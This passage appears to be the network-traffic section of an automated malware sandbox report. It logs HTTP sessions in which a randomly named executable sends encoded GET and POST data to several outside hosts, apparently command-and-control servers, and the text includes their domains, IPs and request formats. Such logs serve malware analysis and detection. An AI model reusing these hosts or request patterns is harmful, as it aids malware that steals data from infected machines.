VjC3GA3sTVhJWpojPproEyHifFor8YERb80bZD0YPNHITCxkoCnj01ZdfM8x6W3WyrHhoHdv5igXVoUsP68AMPhrBTAbgw02/xF84je7sSGA0pc/kC9u40dk7agN8U3ooozYQV+bUH0CALnkQz42LNWHHfydeNrY0HNbblSUkS2WlZIREkntKWaRtmdF [TRUNCATED]
Jul 8, 2024 07:20:23.825975895 CEST	298	IN	HTTP/1.1 404 Not Found Server: openresty Date: Mon, 08 Jul 2024 05:20:23 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: br Data Raw: 35 38 0d 0a a1 a8 04 00 20 76 b6 6e 13 ba d0 b0 c9 17 a2 d2 6c 9a cd 2b af 27 0b b9 7f 97 8c 64 aa 54 d1 9a d0 e8 0d 8f cf c7 90 92 8b 85 2c 09 e3 ac ba 68 9f b0 90 9c 93 8f e4 1b 51 98 0c 93 60 a2 85 80 b0 32 8a 2d 95 0d 55 ed 68 37 f8 cf 05 00 f1 cf d6 bb 6f e3 ea d5 34 23 0d 0a 30 0d 0a 0d 0a Data Ascii: 58 vnl+'dT,hQ`2-Uh7o4#0
Jul 8, 2024 07:20:23.826924086 CEST	298	IN	HTTP/1.1 404 Not Found Server: openresty Date: Mon, 08 Jul 2024 05:20:23 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: br Data Raw: 35 38 0d 0a a1 a8 04 00 20 76 b6 6e 13 ba d0 b0 c9 17 a2 d2 6c 9a cd 2b af 27 0b b9 7f 97 8c 64 aa 54 d1 9a d0 e8 0d 8f cf c7 90 92 8b 85 2c 09 e3 ac ba 68 9f b0 90 9c 93 8f e4 1b 51 98 0c 93 60 a2 85 80 b0 32 8a 2d 95 0d 55 ed 68 37 f8 cf 05 00 f1 cf d6 bb 6f e3 ea d5 34 23 0d 0a 30 0d 0a 0d 0a Data Ascii: 58 vnl+'dT,hQ`2-Uh7o4#0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49745	37.9.175.173	80	4584	C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe

Timestamp	Bytes transferred	Direction	Data
Jul 8, 2024 07:20:25.361834049 CEST	452	OUT	GET /9v4b/?MdEl=QwF7JlY1PSjHVra/0S8TBTTWqpr20fcPe3Kcc1HOimPCQG1R1SgxoF7twkiq9lSaXC7xRVtY7bcnqH/14lNe4iuhLUoUSvgnHPLdNfgr71ArizSeHiw42Bs=&cv4D=Bv0xSH88iTF48zS0 HTTP/1.1 Host: www.gymroom.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Jul 8, 2024 07:20:26.052903891 CEST	343	IN	HTTP/1.1 404 Not Found Server: openresty Date: Mon, 08 Jul 2024 05:20:25 GMT Content-Type: text/html Content-Length: 150 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49746	203.161.41.207	80	4584	C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe

Timestamp	Bytes transferred	Direction	Data
Jul 8, 2024 07:20:31.111470938 CEST	708	OUT	POST /9ntw/ HTTP/1.1 Host: www.hectmalt.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.hectmalt.xyz Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 201 Referer: http://www.hectmalt.xyz/9ntw/ User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 4d 64 45 6c 3d 4f 48 51 38 37 56 76 5a 77 56 37 45 44 47 6f 78 6a 4e 4e 72 6a 79 4c 2f 55 32 4b 47 34 4e 57 79 76 59 46 50 71 71 64 51 70 73 4a 56 6c 56 66 50 71 35 32 6a 6e 42 51 4a 47 2f 6a 56 48 69 34 39 49 4a 33 31 44 53 78 38 2f 63 68 43 69 6c 39 50 73 49 74 57 47 75 70 76 45 37 39 6e 43 76 79 51 56 2f 67 31 31 68 4b 50 46 67 51 42 79 38 6d 50 6b 2f 78 6a 4b 6f 4a 34 57 72 33 32 6f 48 36 4b 57 30 46 41 53 59 4f 68 74 48 74 4f 32 57 38 63 4c 78 4e 41 6d 38 71 79 38 64 64 31 31 4f 32 52 4d 4b 71 57 76 43 56 4a 33 65 4d 4f 48 43 33 76 34 76 5a 2f 50 52 42 43 4c 4d 41 71 34 47 52 6d 6f 67 3d 3d Data Ascii: MdEl=OHQ87VvZwV7EDGoxjNNrjyL/U2KG4NWyvYFPqqdQpsJVlVfPq52jnBQJG/jVHi49IJ31DSx8/chCil9PsItWGupvE79nCvyQV/g11hKPFgQBy8mPk/xjKoJ4Wr32oH6KW0FASYOhtHtO2W8cLxNAm8qy8dd11O2RMKqWvCVJ3eMOHC3v4vZ/PRBCLMAq4GRmog==
Jul 8, 2024 07:20:31.724991083 CEST	533	IN	HTTP/1.1 404 Not Found Date: Mon, 08 Jul 2024 05:20:31 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49747	203.161.41.207	80	4584	C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe

Timestamp	Bytes transferred	Direction	Data
Jul 8, 2024 07:20:33.643757105 CEST	728	OUT	POST /9ntw/ HTTP/1.1 Host: www.hectmalt.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.hectmalt.xyz Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 221 Referer: http://www.hectmalt.xyz/9ntw/ User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 4d 64 45 6c 3d 4f 48 51 38 37 56 76 5a 77 56 37 45 43 6d 34 78 6c 65 6c 72 71 79 4c 34 52 32 4b 47 74 39 58 31 76 59 4a 50 71 72 59 4e 70 59 6c 56 6c 31 50 50 74 37 4f 6a 75 52 51 4a 65 76 6a 51 44 69 34 41 49 4a 7a 4d 44 53 4e 38 2f 63 6c 43 69 6c 4e 50 74 35 74 52 41 2b 70 74 66 4c 39 68 64 2f 79 51 56 2f 67 31 31 68 66 61 46 67 59 42 79 73 57 50 6b 63 70 73 55 59 4a 37 42 62 33 32 37 58 36 4f 57 30 45 6a 53 61 72 4d 74 46 56 4f 32 55 6b 63 4c 6b 78 48 2f 4d 71 6f 34 64 63 34 2b 2f 50 44 4a 50 58 59 77 54 68 51 35 66 67 32 43 45 6d 31 70 65 34 6f 64 52 6c 78 57 4c 4a 65 31 46 73 76 7a 6a 76 78 37 38 4b 77 59 6c 65 68 76 75 43 36 39 42 49 65 6d 47 67 3d Data Ascii: MdEl=OHQ87VvZwV7ECm4xlelrqyL4R2KGt9X1vYJPqrYNpYlVl1PPt7OjuRQJevjQDi4AIJzMDSN8/clCilNPt5tRA+ptfL9hd/yQV/g11hfaFgYBysWPkcpsUYJ7Bb327X6OW0EjSarMtFVO2UkcLkxH/Mqo4dc4+/PDJPXYwThQ5fg2CEm1pe4odRlxWLJe1Fsvzjvx78KwYlehvuC69BIemGg=
Jul 8, 2024 07:20:34.231651068 CEST	533	IN	HTTP/1.1 404 Not Found Date: Mon, 08 Jul 2024 05:20:34 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49748	203.161.41.207	80	4584	C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe

Timestamp	Bytes transferred	Direction	Data
Jul 8, 2024 07:20:36.174514055 CEST	10810	OUT	POST /9ntw/ HTTP/1.1 Host: www.hectmalt.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.hectmalt.xyz Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 10301 Referer: http://www.hectmalt.xyz/9ntw/ User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 4d 64 45 6c 3d 4f 48 51 38 37 56 76 5a 77 56 37 45 43 6d 34 78 6c 65 6c 72 71 79 4c 34 52 32 4b 47 74 39 58 31 76 59 4a 50 71 72 59 4e 70 5a 78 56 6b 47 33 50 74 63 61 6a 38 42 51 4a 53 50 6a 52 44 69 34 6e 49 4e 6d 45 44 53 42 73 2f 65 74 43 77 32 46 50 71 4c 56 52 4a 2b 70 74 58 72 39 67 43 76 79 4a 56 37 45 78 31 68 50 61 46 67 59 42 79 75 2b 50 77 66 78 73 57 59 4a 34 57 72 33 45 6f 48 36 6d 57 30 4e 59 53 61 76 36 74 30 31 4f 32 30 30 63 4a 57 5a 48 32 4d 71 75 32 39 64 72 2b 2b 79 64 4a 50 6a 69 77 54 56 71 35 63 38 32 43 41 4c 77 30 39 67 48 4a 41 30 6a 43 4b 74 31 2b 43 59 51 39 43 79 45 39 50 75 30 48 6b 43 4b 30 75 48 6a 6f 51 41 69 31 44 34 33 39 63 4f 41 36 2b 71 78 63 41 31 44 6d 69 72 73 72 33 4d 6b 69 71 2f 37 2b 45 72 58 6e 73 65 61 6c 32 4a 37 30 73 64 2f 6d 56 38 42 45 71 64 66 70 56 49 6d 59 58 74 36 79 75 35 70 49 72 4b 78 57 79 7a 6c 2b 39 56 37 64 76 42 34 41 61 62 39 33 49 67 53 6b 6b 4f 6c 52 79 52 31 2f 6b 31 59 63 77 35 58 4e 59 49 48 62 58 70 6a 37 51 63 74 55 41 72 53 6f [TRUNCATED] Data Ascii: MdEl=OHQ87VvZwV7ECm4xlelrqyL4R2KGt9X1vYJPqrYNpZxVkG3Ptcaj8BQJSPjRDi4nINmEDSBs/etCw2FPqLVRJ+ptXr9gCvyJV7Ex1hPaFgYByu+PwfxsWYJ4Wr3EoH6mW0NYSav6t01O200cJWZH2Mqu29dr++ydJPjiwTVq5c82CALw09gHJA0jCKt1+CYQ9CyE9Pu0HkCK0uHjoQAi1D439cOA6+qxcA1Dmirsr3Mkiq/7+ErXnseal2J70sd/mV8BEqdfpVImYXt6yu5pIrKxWyzl+9V7dvB4Aab93IgSkkOlRyR1/k1Ycw5XNYIHbXpj7QctUArSou6vCq+oOGVRpoBWknPPPR5qvxxYAUaE8tnD4zFw4HAyydlEmXugXSMqI3F+DeMfgMcJ78okIghlE+/LguKU4XUqAoF1BGamBmW4a5KcuRFChAGZEGxxEVTwy1VbNa2kGft3GO1lLMPMEmAFRQFbb5SjVaN4npAoRGF1ytvjZIt5Yec8IDDZ3OvY16z2lph7c1Nfu8KxL7yTs6XfIMbrGxXOjgb8ubwUlVY0tsdZ9UemuVddSCK0u+p80NQiogLyb9ZMMJEChb+Fm1TkjaK/Grn7/mniMH7w6LUtBUOoR69EuKSEMRedTR32mn1raV9H9PANHCYf2XHri/GnDN3c/xsxAAnJCZMvnbJazZyj8RaxV4S7BV13MECAyK82ZM5FsBQuqiSxJre9oPnljTkR1MEnR6gvrEzmPKrid+53mCaYbdgWpjrdc0BFXdTmdH4fBJF84sOUPumfG9WLRmWpXXHmEoNCOa8xA3v7oKaQ6hbDargyLfAqI+9O3V+HrG0qibU3hd73f2A+uV2005v1JF7CHEjahOnOImabRrJXg/ODX3+34ht3TiwvkXJqxhIANIE4hyCBdVUbzERJiwW3Ql/bt2q5kkFsWvj0oG+3l4C+STWOu/ATqoT0OYFzpEtr+JBdlsnJyPMV4HOlGu4DM63OKd4ulX279yu [TRUNCATED]
Jul 8, 2024 07:20:36.826518059 CEST	533	IN	HTTP/1.1 404 Not Found Date: Mon, 08 Jul 2024 05:20:36 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49749	203.161.41.207	80	4584	C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe

Timestamp	Bytes transferred	Direction	Data
Jul 8, 2024 07:20:38.705766916 CEST	450	OUT	GET /9ntw/?MdEl=DF4c4jTIr0uCfSFFw8k7okOaWiqusMuq77V3jsF9odELuFK4p5vQm2AEcbSTGQxVKs+ZCGJ5ndNcuFNuj9dUX+A+cKpzBpqYQsgpzguPUBB/nrPxtt52Xac=&cv4D=Bv0xSH88iTF48zS0 HTTP/1.1 Host: www.hectmalt.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Jul 8, 2024 07:20:39.328131914 CEST	548	IN	HTTP/1.1 404 Not Found Date: Mon, 08 Jul 2024 05:20:39 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49750	3.33.130.190	80	4584	C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe

Timestamp	Bytes transferred	Direction	Data
Jul 8, 2024 07:20:44.371917009 CEST	726	OUT	POST /8td2/ HTTP/1.1 Host: www.atlpicsstudios.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.atlpicsstudios.com Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 201 Referer: http://www.atlpicsstudios.com/8td2/ User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 4d 64 45 6c 3d 63 2b 54 49 7a 37 33 4a 30 4a 78 42 47 67 76 32 79 64 70 66 71 75 37 79 66 4a 34 77 71 4a 55 72 46 43 6c 68 72 31 2b 56 4a 4e 6b 35 41 6f 39 34 4c 49 30 64 79 51 4b 70 49 6a 43 42 6d 35 58 6d 49 6e 35 79 64 58 73 32 6e 31 38 44 59 74 59 54 30 45 46 43 35 4f 48 70 62 63 65 77 69 59 46 39 43 7a 4e 49 36 64 54 31 4e 77 4e 72 57 4b 63 72 62 45 35 45 33 7a 46 48 53 78 4a 56 72 35 77 4f 33 79 76 6d 69 74 2f 73 77 33 52 79 41 31 69 78 67 6e 31 39 44 78 75 68 6b 2f 69 65 37 4d 51 49 63 4a 6b 45 76 5a 79 55 35 4c 77 2f 2f 51 70 58 6b 59 66 4c 65 48 75 6a 78 45 38 55 30 32 6d 46 34 67 3d 3d Data Ascii: MdEl=c+TIz73J0JxBGgv2ydpfqu7yfJ4wqJUrFClhr1+VJNk5Ao94LI0dyQKpIjCBm5XmIn5ydXs2n18DYtYT0EFC5OHpbcewiYF9CzNI6dT1NwNrWKcrbE5E3zFHSxJVr5wO3yvmit/sw3RyA1ixgn19Dxuhk/ie7MQIcJkEvZyU5Lw//QpXkYfLeHujxE8U02mF4g==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49751	3.33.130.190	80	4584	C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe

Timestamp	Bytes transferred	Direction	Data
Jul 8, 2024 07:20:46.908771038 CEST	746	OUT	POST /8td2/ HTTP/1.1 Host: www.atlpicsstudios.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.atlpicsstudios.com Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 221 Referer: http://www.atlpicsstudios.com/8td2/ User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 4d 64 45 6c 3d 63 2b 54 49 7a 37 33 4a 30 4a 78 42 48 42 66 32 68 71 64 66 74 4f 37 78 51 70 34 77 34 4a 55 76 46 43 70 68 72 33 53 6a 4b 34 38 35 4f 71 6c 34 4b 4a 30 64 37 41 4b 70 61 44 43 45 69 35 58 76 49 6e 6b 50 64 56 6f 32 6e 31 6f 44 59 6f 38 54 31 33 64 42 37 65 48 76 53 38 65 79 74 34 46 39 43 7a 4e 49 36 64 33 66 4e 7a 39 72 57 36 4d 72 59 6c 35 44 70 6a 46 45 56 78 4a 56 76 35 77 4b 33 79 75 7a 69 73 69 4a 77 78 56 79 41 33 36 78 67 79 42 36 49 78 75 64 71 66 6a 31 34 64 4a 78 54 5a 73 4e 6c 34 69 61 37 49 5a 66 36 57 34 4e 31 70 2b 63 4d 48 4b 51 73 44 31 67 35 31 62 4d 6a 67 63 4a 78 78 30 4d 61 6a 68 61 44 2f 69 6e 4b 43 7a 59 39 56 30 3d Data Ascii: MdEl=c+TIz73J0JxBHBf2hqdftO7xQp4w4JUvFCphr3SjK485Oql4KJ0d7AKpaDCEi5XvInkPdVo2n1oDYo8T13dB7eHvS8eyt4F9CzNI6d3fNz9rW6MrYl5DpjFEVxJVv5wK3yuzisiJwxVyA36xgyB6Ixudqfj14dJxTZsNl4ia7IZf6W4N1p+cMHKQsD1g51bMjgcJxx0MajhaD/inKCzY9V0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49752	3.33.130.190	80	4584	C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe

Timestamp	Bytes transferred	Direction	Data
Jul 8, 2024 07:20:49.445678949 CEST	10828	OUT	POST /8td2/ HTTP/1.1 Host: www.atlpicsstudios.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.atlpicsstudios.com Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 10301 Referer: http://www.atlpicsstudios.com/8td2/ User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 4d 64 45 6c 3d 63 2b 54 49 7a 37 33 4a 30 4a 78 42 48 42 66 32 68 71 64 66 74 4f 37 78 51 70 34 77 34 4a 55 76 46 43 70 68 72 33 53 6a 4b 37 63 35 4f 66 78 34 4b 71 63 64 68 41 4b 70 42 44 43 46 69 35 57 2f 49 6e 38 4c 64 56 31 44 6e 32 51 44 4b 65 77 54 79 43 70 42 79 65 48 76 51 38 65 7a 69 59 45 2f 43 7a 64 79 36 64 6e 66 4e 7a 39 72 57 38 41 72 4d 45 35 44 72 6a 46 48 53 78 4a 6a 72 35 77 75 33 79 58 45 69 76 50 38 77 42 31 79 42 58 71 78 76 6b 64 36 55 68 75 66 70 66 6a 74 34 64 31 51 54 5a 78 30 6c 34 58 78 37 4c 46 66 33 53 74 35 77 4c 6a 41 64 31 61 77 2b 45 56 64 67 55 72 42 75 41 45 2b 30 45 77 6a 46 6a 68 61 5a 63 4f 74 50 44 37 39 69 67 6c 6b 72 34 46 64 44 2f 73 73 57 43 4c 4e 33 2f 64 2b 45 42 4f 6d 2b 4f 78 57 33 41 75 77 78 4a 77 32 6e 75 71 56 72 6f 62 52 71 6d 5a 54 61 41 67 48 53 4e 33 54 38 64 62 31 42 62 77 71 2f 54 35 31 4f 44 42 6f 56 39 4f 51 7a 73 62 75 4b 55 4b 56 72 68 65 42 45 4f 30 45 6d 58 4a 4f 4d 6c 68 79 79 45 46 6e 65 49 76 59 72 70 4b 59 43 41 78 61 39 42 6c 75 47 [TRUNCATED] Data Ascii: 